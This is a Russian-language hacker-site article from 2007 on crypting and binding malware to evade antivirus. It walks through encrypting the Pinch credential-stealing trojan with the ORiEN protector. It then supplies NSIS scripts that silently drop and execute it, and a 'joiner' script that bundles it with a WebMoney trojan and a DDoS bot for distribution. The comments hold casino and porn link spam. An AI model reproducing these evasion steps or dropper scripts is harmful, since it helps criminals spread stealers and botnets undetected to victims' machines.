Криптуем и клеим файлы паблик-софтом. » ..::XakepOK.ORG::..
XakepOK.ORG Logo
    
ГЛАВНАЯ  |  ФОРУМ  |  НОВОСТИ  |  СТАТЬИ  |  РЕЛИЗЫ  |  E-BOOKS  |  СКАЧАТЬ  |  WEB-TOOLS |  СНИФФЕР  |  ЮЗЕРБАРЫ  |  О НАС
Последние темы с форума
Название темы Пользователь Просмотров Ответов
ftp_iframer.pl 4NT1P0V142
Работа программ в Висте filatOFF77410
Продам загрузки(контент) для WAP сайта! free-boy20
INV4S10N Downloader v3.0 lexel501
BlackDownloader v.1.1 lexel551
Spider Downloader 1.0 lexel551
Reaper Downloader v2.0 lexel661


Криптуем и клеим файлы паблик-софтом. Категория: Статьи » Разное

14 сентября 2007 | Автор: nexgen | Просмотров: 707 |
Криптуем и клеим файлы паблик-софтом.
В этой статье я расскажу Вам, как закриптовать троян или склеить несколько exe-файлов вредоносного ПО подручными средствами и избежать его детектирование любыми антивирусами.
Рассмотрим скрытие от антивирусов трояна Pinch, как наиболее часто применяемого на территории бывшего СССР да и не только.
Из подручных средств нам понадобится протектор ORiEN и система для создания инсталляторов Nullsoft Scriptable Install System. Выбор именно этих средств обусловлен малым размером приклеиваемого стаба(что сказывается довольно малым увеличением, а с учетом компрессии зачастую и уменьшением размера криптованного файла по сравнению с исходным) и их бесплатностью.
Итак, начнем.
Сначала скачаем и установим вышеупомянутые инструменты с их официальных сайтов:
ORiEN: http://zalexf.narod.ru/
Nullsoft Scriptable Install System: http://nsis.sourceforge.net/
Затем запустим протектор ORiEN
С помощью кнопки Обзор укажем путь к пинчу. Затем перейдем к вкладке Пароль и установим его чтение из командной строки. Затем введем в первое поле ввода любой пароль(главное не забыть его до конца процедуры криптования) – им будет шифроваться наш троян. После ввода пароля чекбокс наротив поля ввода станет активен – отметим его.
После этого станет активен другой чекбокс – Защита по паролю. Его тоже необходимо отметить. После выполнения этих операций нажимаем кнопку Старт. Теперь желательно протестировать зашифрованный файл. Для этого просто запускаем его и если появляется MsgBox с сообщением “Неверный пароль”, то криптование прошло успешно.
Теперь можно переходить к следующему этапу – созданию инсталлятора с помощью Nullsoft Scriptable Install System(NSIS).
Создадим текстовый документ и вставим в него следующий код

<!-- . . .
Код:
OutFile "crypted.exe"
SilentInstall silent

Section "crypt"
SetOutPath "$TEMP"
SetOverwrite on
File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"
Execwait "$TEMP\pinch.exe !psw=123"
Delete $TEMP\pinch.exe
SectionEnd
<!-- .: . . Теперь необходимо немного отредактировать этот код.
В строке File "C:\DocumentsandSettings\gol\Рабочий стол\pinch. exe" должен находиться правильный путь к зашифрованному файлу, полученному с помощью протектора ORiEN на предыдущем этапе.
В строке Exec "$TEMP\pinch.exe !psw=123" после !psw= должен быть указан пароль, которым мы шифровали файл. Сохраним созданный текстовый файл.
Теперь запустим утилиту MakeNSISW соответствующим ярлыком из меню “Пуск”
Перетащим туда созданный текстовый файл. Если все сделано правильно, на рабочем столе должен появиться файл crypt.exe, который можно спокойно распространять.
Также NSIS может использоваться в качестве неплохого джойнера. Для этого в скрипте инсталлятора необходимо использовать директиву File и Exec вместо Execwait несколько раз.
Например чтобы склеить 3 файла, скрипт для NSIS будет выглядеть следующим образом:

<!-- . . .
Код:
OutFile "joined.exe"
SilentInstall silent

Section "file1"
SetOutPath "$TEMP"
SetOverwrite on
File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"
Exec $TEMP\pinch.exe
SectionEnd

Section "file2"
SetOutPath "$TEMP"
SetOverwrite on
File "C:\Documents and Settings\adm\Рабочий стол\wmtroj.exe"
Exec $TEMP\wmtroj.exe
SectionEnd

Section "file3"
SetOutPath "$TEMP"
SetOverwrite on
File "C:\Documents and Settings\adm\Рабочий стол\ddosbot.exe"
Exec $TEMP\ddosbot.exe
SectionEnd
<!-- .: . . Если будет необходимо удалить файлы после их запуска, то желательно использовать Execwait и Delete.

Теперь о размере закриптованного файла:
После конфигурирования паблик-пинча от Vaska он имел размер 50 кб в несжатом виде.
После криптования пинч стал весить 65 кб. По сравнению с криптованием протектором типа Themida, где пинч увеличивается в размере с 50 кб до 380 кб описанный способ имеет неоспоримые преимущества. Увеличение объема файла вполне соизмеримо с результатами работы приватными крипторами, актуальные версии которых доступны далеко не всем.


          Комментарии: 4
#1 Комментарий от: Reabok

29 сентября 2007 19:36 | ICQ: --
Сенькс. Сам файл перестал обнаружаться, но при запуске его антивирусы всё равно блокируют его как пинч.
#2 Комментарий от: Привет

17 ноября 2007 11:19 | ICQ: --
Make real money whith the most trusted _casino-poker-online.tripod.com/real-money-online-poker.html" _real money online poker_ casino.
Search for top _casino-poker-online.tripod.com/casino-game-online-play-poker-top.html" _casino game online play poker top_ sites
Find best online poker room to get real money whith _casino-poker-online.tripod.com/best-online-poker-room.html" _best online poker room_ best online poker casino games
_casino-poker-online.tripod.com/beat-game-online-play-poker.html" _beat game online play poker_
Get best beat online poker _casino-poker-online.tripod.com/play-poker-online-no-download.html" _play poker online no download_
No download! Play online poker now! And enjoy best gambling online poker sites now!
#3 Комментарий от: QA

20 ноября 2007 13:17 | ICQ: --
_web-online-games.tripod.com/adult-free-game-online-play-porn.html" _adult free game online play porn_ _web-online-games.tripod.com/free-adult-online-porn-game.html" _free adult online porn game_ _web-online-games.tripod.com/free-adult-online-xxx-game.html" _free adult online xxx game_ _web-online-games.tripod.com/free-adult-online-java-game.html" _free adult online java game_ _web-online-games.tripod.com/free-online-sonic-the-hedgehog-game.html" _free online sonic the hedgehog game_ _web-online-games.tripod.com/free-game-online-play-sonic.html" _free game online play sonic_ _web-online-games.tripod.com/sonic-x-game-online-for-free.html" _sonic x game online for free_ _web-online-games.tripod.com/free-game-mario-online-sonic-super.html" _free game mario online sonic super_ _web-online-games.tripod.com/play-free-yahoo-game-online.html" _play free yahoo game online_ _web-online-games.tripod.com/free-game-online-play-yahoo.html" _free game online play yahoo_ _web-online-games.tripod.com/bowling-free-game-online-play.html" _bowling free game online play_ _web-online-games.tripod.com/bowling-game-online-pin-ten.html" _bowling game online pin ten_ _web-online-games.tripod.com/bowling-free-game-kid-online.html" _bowling free game kid online_ _web-online-games.tripod.com/bowling-game-online-shock-wave.html" _bowling game online shock wave_ _web-online-games.tripod.com/free-online-video-poker-game.html" _free online video poker game_ _web-online-games.tripod.com/free-game-online-play-video-yahoo.html" _free game online play video yahoo_
#4 Комментарий от: GwozD

6 июня 2008 19:23 | ICQ: --
Перелазайте ссылки, плз.
Очень хочется попробовать, но за полезную инфу все равно спасибо

Вот эта еще работает http://zalexf.narod_/res/download/orie
n.zip

И эта тоже:


Рабочие ссылки:
NSIS http://sourceforge.net/project/downloadi
ng.php?groupname=nsis&filename=nsis-2.30
-setup.exe&use_mirror=mesh

ORiEN http://zalexf.narod_/res/download/orie
n.zip

Добавление комментария

Ваше Имя:


Ваш E-Mail:





Капча:            Включите эту картинку для отображения кода безопасности
обновить код

Введите код:

Навигация
Главная
Форум
Новости

Статьи
»Web-hack
»ICQ-hack
»Cracking
»Кодинг
»Соц. инженерия
»Разное

SEO
Книги
Web-tools
PHP-прокси
Обмен файлами
Сниффер
Информер
Генератор юзербаров
IRC-канал
О нас
Вход в систему
Логин:
Пароль:
 
Топ новостей
» Китайскому хакеру грозит около 7 лет тюремного заключен ...
» C новым, 2009 годом, и Рождеством Христовым!
» Хакеры стремительно молодеют
» Фоторамки с вирусами
» В 2009 г. будут «править» банковские трояны и лже-антив ...
» Украинским провайдерам предложили облагородить интернет
» УФАС признала спамеров виновными в нарушении закона о р ...
» Хакеры скомпрометировали данные 1,5 млн клиентов банка ...
» Украинские СМИ записали Ющенко в хакеры
Опрос
Кто такой по-вашему хакер?

Это - Я!!!
Жаждущий знаний
Преступник
Ну я даже не знаю...
Герой нашего времени
Сесть мы всегда успеем


Друзья сайта
..::XakNet.Ru::..
..::GraBBerZ.CoM::..
Eugen.SU Webt00lZ
TEM.DP.UA
..::Illmax.ru::..
..::qseZ.ORG::..
..::Tolpa.ORG::..
..::ProLogic.ws::..
52Nn TeaM
hacklab.org.ru
..::web-a.info::..
Indetails.info
.::VzloM.IN::.
Evil Forest
.:BlackHack.Ru:.
Планету-хакерам
...::ICQ Primary Base::...
TGBR Community
Ссылки
Счетчики:
дизайн сайта: Rock Technologies — достичь вершин